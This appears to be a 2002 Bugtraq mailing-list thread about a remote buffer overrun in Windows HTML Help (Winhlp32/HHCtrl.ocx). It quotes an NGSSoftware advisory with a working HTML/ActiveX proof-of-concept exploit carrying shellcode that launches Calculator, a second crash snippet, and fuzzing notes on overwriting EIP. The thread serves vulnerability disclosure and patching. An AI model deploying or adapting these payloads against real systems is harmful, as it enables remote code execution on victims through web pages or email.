Correction, closing out of the app brings up an error where the memory read is controlled at 4141414d (EIP is elsewhere), so it appears to be a different type of crash by behavior entirely... but exploitable. Would need to stick a debugger on it and mess around to narrow it down. > -----Original Message----- > From: Drew [mailto:dcopley@eeye.com] > Sent: Tuesday, August 06, 2002 7:31 PM > To: 'Mark Litchfield'; 'Jelmer'; 'bugtraq@securityfocus.com' > Subject: RE: Winhelp32 Remote Buffer Overrun > > > Running this on my local file fuzzer, Litchfield's begins to > hit exceptions at > 200 increments. (At a blank value it gives a memory error). > > At 216 increments (and at least for awhile, above) it > overwrites EIP with > 41414141. (Windows 2000 Service Pack 2). > > Testing Jelmer's as it was written below I ran to 10,000 > increments and did not find an issue. Testing to 10,000 with > .TIF as the extension did not find an issue. Testing these > same case tests with using the method > HHClick() as in Litchfield's does not give an issue. > > It may have been with another method, or perhaps some > interaction with the webpage. It may be the characters used > to bruteforce it. Perhaps, they were unicode (which I could > test, as well as anything else). > > > > > -----Original Message----- > > From: Mark Litchfield [mailto:mark@ngssoftware.com] > > Sent: Tuesday, August 06, 2002 12:24 PM > > To: Jelmer; bugtraq@securityfocus.com > > Subject: Re: Winhelp32 Remote Buffer Overrun > > > > > > If I am not mistaken, I believe that Microsoft are aware of > > this issue and have an IE patch comming out very shortly. My > > brother reported this to them, please see > > http://www.nextgenss.com/vna/ms-whelp.txt > > > > Regards > > > > Cheers, > > > > > > Mark Litchfield > > > > ----- Original Message ----- > > From: "Jelmer" <jelmer@kuperus.xs4all.nl> > > To: "Next Generation Insight Security Research Team" > > <mark@ngssoftware.com>; <bugtraq@securityfocus.com>; > > <ntbugtraq@listser.ntbugtraq.com> > > Sent: Thursday, August 01, 2002 5:19 PM > > Subject: Re: Winhelp32 Remote Buffer Overrun > > > > > > > I just installed servicepack 3 and the following code still > > crashed my > > > my IE6 with a memory could not be refferenced error. > > > > > > <OBJECT ID=hhctrl TYPE="application/x-oleobject" > > > CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> > > > <PARAM name="Command" value="Shortcut"> > > > <PARAM name="Button" value="Bitmap:shortcut"> > > > <PARAM name="Item1" value=",,"> > > > <PARAM name="Item2" value="273,1,1"> > > > <PARAM name="codebase" value=""> > > > <PARAM name="Font" value=" A VERY VERY LONG STRING "> > </OBJECT> > > > > > > I have been told this means it is most likely > exploitable. I am not > > > into buffer overflows myself though, maybe someone can > > confirm this. > > > Anyways I notified microsoft of this several months ago. > > The day after > > > I notified > > them > > > someone pointed me to the ngssoftware advisory *sob*, and I > > notified > > > microsoft that this was probably the same issue, last I heard from > > > them > > they > > > where looking in to if this was indeed the case. It's been several > > > months and as far as I know they are still looking. > > > > > > -- > > > jelmer > > > > > > ----- Original Message ----- > > > From: "Next Generation Insight Security Research Team" > > > <mark@ngssoftware.com> > > > To: <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com> > > > Sent: Friday, August 02, 2002 3:59 AM > > > Subject: Winhelp32 Remote Buffer Overrun > > > > > > > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > > Hash: SHA1 > > > > > > > > NGSSoftware Insight Security Research Advisory > > > > > > > > Name: Winhlp32.exe Remote BufferOverrun > > > > Systems Affected: Win2K Platform > > > > Severity: Critical > > > > Category: Remote Buffer Overrun > > > > Vendor URL: http://www.mircosoft.com > > > > Author: Mark Litchfield (mark@ngssoftware.com) > > > > Date: 1st August 2002 > > > > Advisory number: #NISR01082002 > > > > > > > > > > > > Description > > > > *********** > > > > > > > > Many of the features available in HTML Help are > > implemented through > > > > the HTML Help ActiveX control (HHCtrl.ocx). The HTML > Help ActiveX > > > > control is used to provide navigation features (such as a > > table of > > > > contents), to display secondary windows and pop-up > > definitions, and > > > > to provide other features. The HTML Help ActiveX control > > can be used > > > > from topics in a compiled Help system as well as from HTML pages > > > > displayed in a Web browser. The functionality provided by > > the HTML > > > > Help ActiveX control will run in the HTML Help Viewer or in any > > > > browser that supports ActiveX technology, such as > > Internet Explorer > > > > (version 3.01 or later). Some features, as with the > > WinHlp Command, > > > > provided by the HTML Help ActiveX control are meant to be > > available > > > > only when it is used from a compiled HTML Help file > > (.chm) that is > > > > displayed by using the HTML Help Viewer. > > > > > > > > Details > > > > ******* > > > > > > > > Winhlp32.exe is vulnerable to a bufferoverrun attack > > using the Item > > > > parameter within WinHlp Command, the item parameter is used to > > > > specify the file path of the WinHelp (.hlp) file in which the > > > > WinHelp topic is stored, and the window name of the > > target window. > > > > Using this overrun, an attacker can successfully exectute > > arbitary > > > > code on a remote system by either encouraging the victim > > to visit a > > > > particular web page, whereby code would execute > > automatically, or by > > > > including the exploit within the source of an email. In > > regards to > > > > email, execution would automatically occur when the mail > > appears in > > > > the preview pane and ActiveX objects are allowed (This is > > allowed by > > > > default, the Internet Security Settings would have to be > > set as HIGH > > > > to prevent execution of this vulnerability). Any exploit would > > > > execute in the context of the logged on user. > > > > > > > > Visual POC Exploit > > > > ****************** > > > > > > > > This POC will simply display Calculator. Please note that this > > > > written on a Win2k PC with SP2 installed. I have not > > tested it on > > > > anything else. > > > > > > > > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 > > > > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp > > > > type=application/x-oleobject width=0><PARAM NAME="Width" > > > > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM > NAME="Command" > > > > VALUE="WinHelp"><PARAM NAME="Item1" > > > > > > VALUE="3ĄPhcalc4$ƒĄPVøƧéw’Š3ĄP¾”éw’ÖAAAAAA > > > > AA > > > > > > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > > > > > > > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP > > > > > > > PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒĘ’ęgMyWindow"><PARAM > > > > NAME="Item2" VALUE="NGS Software LTD"></OBJECT> > > > > <SCRIPT>winhelp.HHClick()</SCRIPT> > > > > > > > > > > > > Fix Information > > > > *************** > > > > > > > > NGSSoftware alerted Microsoft to these problems on the 6th March > > > > 2002. NGSSoftware highly recommend installing Microsoft > > Windows SP3, > > > > as the fix has been built into this service pack found at > > > > http://www.microsoft.com An alternative to these patches > > would be to > > > > ensure the security settings found in the Internet > > Options is set to > > > > high. Despite the Medium setting, stating that unsigned ActiveX > > > > controls will not be downloaded, Kylie will still execute > > Calc.exe. > > > > Another alternative would be to remove winhlp32.exe if it is not > > > > required within your environment. > > > > A check for these issues has been added to Typhon II, of > > which more > > > > information is available from the > > > > NGSSoftware website, http://www.ngssoftware.com. > > > > > > > > Further Information > > > > ******************* > > > > > > > > For further information about the scope and effects of buffer > > > > overflows, please see > > > > > > > > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf > > > > http://www.ngssoftware.com/papers/ntbufferoverflow.html > > > > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf > > > > http://www.ngssoftware.com/papers/unicodebo.pdf > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > > > > Version: PGPfreeware 7.0.3 for non-commercial use > > > > <http://www.pgp.com> > > > > > > > > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p > > > > a+qSkYWrz7uspZcqqRTc2r0C > > > > =2PKN > > > > -----END PGP SIGNATURE----- > > > > > > > > > > > > > > > > > > > > > > > > > > > > > >
